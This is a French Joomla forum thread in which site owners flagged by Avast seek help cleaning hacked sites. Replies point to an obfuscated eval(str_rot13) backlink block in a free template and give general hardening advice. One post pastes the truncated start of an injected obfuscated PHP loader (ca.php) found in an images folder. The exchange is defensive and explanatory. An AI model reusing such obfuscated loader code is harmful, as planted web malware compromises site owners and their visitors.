Site piraté, bloqué par AVAST

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Site piraté, bloqué par AVAST

    Bonjour,

    Depuis cet après midi les utilisateurs de mon site ayant AVAST sur leur PC, sont bloqués !
    Moi y compris, tout est OK si on désactive l'agent Web d'Avast.
    J'ai Mac Cafee sur un autre PC tout est OK !
    Voici le résultat du blocage :

    Cliquez sur l'image pour l'afficher en taille normale  Nom : virus.jpg  Affichages : 1  Taille : 24,2 Ko  ID : 1819518

    J'ai fait un scan du PC : RAS, Malwarebytes : RAS.
    J'ai ouvert le site avec IE et j'obtiens ceci : " Template by 888 Poker Bonus code " ceci n'a rien à voir avec mon site !
    Cliquez sur l'image pour l'afficher en taille normale  Nom : virus2.jpg  Affichages : 1  Taille : 99,2 Ko  ID : 1819519

    Je crois que je suis infecté, pourtant j'ai installé Crawlprotect et Jsecure !!
    Avez vous une solution évitant de tout recharger, quel antivirus peut-on mettre sur le site pour éradiquer ce cheval de troie sur le serveur, je suis chez 1&1 ?
    Voici l'adresse du site :http://www.cse-cyclo-creusot.fr/
    Merci d'avance de votre aide,
    Dernière édition par reyon71 à 04/11/2023, 18h49

  • #2
    Re : Site piraté, bloqué par AVAST

    Bonjour,

    Le site est bien piraté: http://sitecheck.sucuri.net/results/...clo-creusot.fr

    La meilleure solution est évidemment de remettre une sauvegarde propre.
    Sinon, il faut supprimer le code ajouté. Pour connaitre les fichiers modifiés on peut utiliser la méthode indiquée sur cette page : http://ralph.davidovits.net/internet...html#fichmodif
    UP, le plugin universel à découvrir sur https//up.lomart.fr
    bgMax
    , AdminOrder, MetaData, Zoom, ArtPlug, Custom, Memo, Filter, ... sur http://lomart.fr/extensions

    Commentaire


    • #3
      Re : Site piraté, bloqué par AVAST

      Bonjour,

      Le template étant malita, free, mais avec une vérole eval(str_rot13("le machin")) dans functions.php, il est à fuir comme la peste, la chaine en rot13 étant l'ouverture de liens externes, avec en danger potentiel, l'injection d en'importe quel JavaScript.
      Pas de demande de support par MP.
      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

      Commentaire


      • #4
        Re : Site piraté, bloqué par AVAST

        Bonsoir,
        J'ai sauvegardé la version en ligne, et j'ai passé tout cela à l'antivirus. C'est bien le fichier index.php du template qui est vérolé. J'ai dé-publié les lignes de code que j'ai trouvé comme mauvaises, le site fonctionne bien. J'ai ensuite supprimer ces mêmes lignes et repassé à l'antivirus qui me trouve mon fichier OK. Je le remplace sur le serveur : Plantage du template avec le message " The template will be break if the link is broken "
        Il y a surement une autre ou des autres lignes à modifier, mais je ne sais pas lesquelles, pouvez vous m'aider, je peux vous envoyer le fichier en MP si vous voulez,
        Merci de votre réponse !

        Commentaire


        • #5
          Re : Site piraté, bloqué par AVAST

          " The template will be break if the link is broken "
          Enlever la vérole de ce template est une violation de ce qu eréclame son auteur.

          La vraie solution est de changer de template.
          Pas de demande de support par MP.
          S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

          Commentaire


          • #6
            Re : Site piraté, bloqué par AVAST

            J'ai du mal à comprendre ...
            J'ai remonté dans mes sauvegardes, et le fichier index est le même qu'aujourd'hui ! et Avast et les autres anti virus n'avaient rien détecté, ce template fonctionne depuis 18 mois sans pb ! Aujourd'hui seul Avast détecte ce pb, avez vous une idée de la raison, j'aimerais comprendre, par ailleurs si le template est vérolé, c'est d'origine et l'auteur est coupable ! Dans ce cas on doit pouvoir le modifier !! Adieu la propriété ! Enfin à mes yeux d’honnête homme ...
            Bien sur le changement de template est la meilleure solution, c'est ce que je vais faire, mais cela représente du travail et du temps, j'aimerais avoir une solution transitoire ...

            En tout cas merci de vos réponse,

            Commentaire


            • #7
              Re : Site piraté, bloqué par AVAST

              Les divers anti-virus/anti-malware se sont adaptés. Le code utilisé par ce template pour planquer ses liens utilise du eval(rot13, méthode d'encodage de pas mal de malwares, d'où la réaction de Avast.

              si le template est vérolé, c'est d'origine et l'auteur est coupable !
              Vérolé n'est pas le terme juste, disons que l'auteur planque ses backlinks en encodant une partie du template. Il n'est pas le seul, de nombreux templates Free utilisent cette technique, que nous réprouvons.
              Dernière édition par jisse03 à 19/08/2013, 20h29
              Pas de demande de support par MP.
              S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

              Commentaire


              • #8
                Re : Site piraté, bloqué par AVAST

                Bonjour

                ce sujet m'intéresse car notre site associatif a été piraté pour la 3° fois cette année par des ALgériens (https://www.facebook.com/Amazigh.Attackers).
                Un utilisateur équipé d'AVAST m'avait indiqué que le site comportait un cheval de troie juste avant qu'il ne soit piraté.
                J'avais tout remis à plat en début juillet en ré-installant J 3 et en changeant tous les login et mots de passe (ftp, admin, mysql).

                Comment débusquer le code malveillant ?

                Est-ce que cela peut-être dans la bdd ?

                Seul le domaine principal est touché (www.avef.fr) les sous domaines jamais (ex dent.avef.fr)

                Merci de votre aide

                Amicalement votre

                Commentaire


                • #9
                  Re : Site piraté, bloqué par AVAST

                  Bonjour,
                  Envoyé par drcharlot Voir le message
                  ce sujet m'intéresse car notre site associatif a été piraté pour la 3° fois cette année par des ALgériens

                  {stuff deleted}
                  Comment débusquer le code malveillant ?

                  Est-ce que cela peut-être dans la bdd ?
                  Débusquer le code malveillant est du coup par coup, il existe des milliers de cas de figure possibles, bien que la plupart des attaques se situent au niveau du index.php des templates.

                  Certains malwares exploitent également une faille de PHP permettant l'injection de code aléatoire.

                  Penser à protéger le répertoire /images et /media http://forum.joomla.org/viewtopic.php?f=621&t=773784

                  D'autres sites sont sur des serveurs ayant un système Debian, avec une faille (moins connue) de sa libc système, permettant d'exploiter un débordement de la pile d'appel sur la fonction realpath().

                  Penser à protéger ses sites, au niveau serveur, avec l'extension PHP Suhosin, qui protège bien de ces failles, et dans tous les cas, en mettant un .htaccess sur les répertoires fragiles.
                  Pas de demande de support par MP.
                  S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                  Commentaire


                  • #10
                    Re : Site piraté, bloqué par AVAST

                    Et également, des outils genre CrawlProtect et CrawlTrack aident énormément.
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : Site piraté, bloqué par AVAST

                      Envoyé par jisse03 Voir le message
                      Et également, des outils genre CrawlProtect et CrawlTrack aident énormément.
                      j'ai lu via le lien sus-cité, merci ! (http://ralph.davidovits.net/internet...html#fichmodif)

                      du coup en utilisant leur php fichmodif, j'ai trouvé un fichier ca.php (texte infra) qui a été ajouté dans les images à un moment où je n'étais pas en ligne ainsi que des mofif sur des fichiers dans les dossiers logs et cache de gantry

                      encore merci

                      le début du fichier ca.php :
                      [I]<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE 335260=base64_decode($T059EC46CFE335260);$TC9A16C4 7DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E 4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A74 7C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD 9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C 13=__FILE__;$T43D5686285035C13=file_get_contents($ T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match (base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T4 3D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159 DC7D007D3<$T0D47BDF6FD9DDE2E{if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7= (ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8 000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(o rd($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A4 7E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E 72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7 FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$ TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8 B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5 686285035C13=implode("",$T7C7E72B89B83E235);$T43D5 686285035C13="?".">".$T43D5686285035C13;return

                      Commentaire


                      • #12
                        Re : Site piraté, bloqué par AVAST

                        Là, tu as trouvé le fichier, mais pas comment il a été introduit.

                        Penses à installer une protection pro active de ton site, avec par exemple CrawlProtect.
                        Pas de demande de support par MP.
                        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                        Commentaire


                        • #13
                          Re : Site piraté, bloqué par AVAST

                          un premier pas !

                          je vais installer tout cela et sinon trouver un pro pour s'occuper de ce site,
                          l'associatif c'est bien mais chronophage quand il faut développer des compétences nouvelles !

                          sinon, il va falloir que je cotise à l'AFUJ pour soutenir ce beau forum, non ?

                          Commentaire


                          • #14
                            Re : Site piraté, bloqué par AVAST

                            Envoyé par drcharlot Voir le message
                            un premier pas !

                            je vais installer tout cela et sinon trouver un pro pour s'occuper de ce site,
                            l'associatif c'est bien mais chronophage quand il faut développer des compétences nouvelles !

                            sinon, il va falloir que je cotise à l'AFUJ pour soutenir ce beau forum, non ?
                            Conserver la sécurité est non seulement chronopge, mais également de quoi passer tes soirées à lire tant les bugs Joomla! que les infos sécurité PHP, Apache, MySQL...
                            L'associatif, pour ces projets a des qualités et des défauts.
                            Qualités: s'investir dans un projet
                            Défauts: Ne pas avoir le budget pour tout ce qui est maintien de la présence web...
                            Dernière édition par jisse03 à 19/08/2013, 22h30
                            Pas de demande de support par MP.
                            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                            Commentaire


                            • #15
                              Re : Site piraté, bloqué par AVAST

                              Bonjour,

                              Je suis victime de la même attaque : eval(base64_decode(

                              J'ai crawlprotect et track d'installé.

                              Pourtant c'est la deuxième fois en 2 mois, alors qu'auparavant jamais de soucis.

                              Y a t il un moyen de savoir par où l'intégration du code se fait ?

                              Mes chmod sont à 705 sur les répertoires et 604 sur les fichiers, après l'infection.

                              Lorsque je regarde sur d'autres sites, ils sont à 755 et 644

                              Se peut il qu'il y ai une incidence ?

                              à bientôt

                              avanti

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X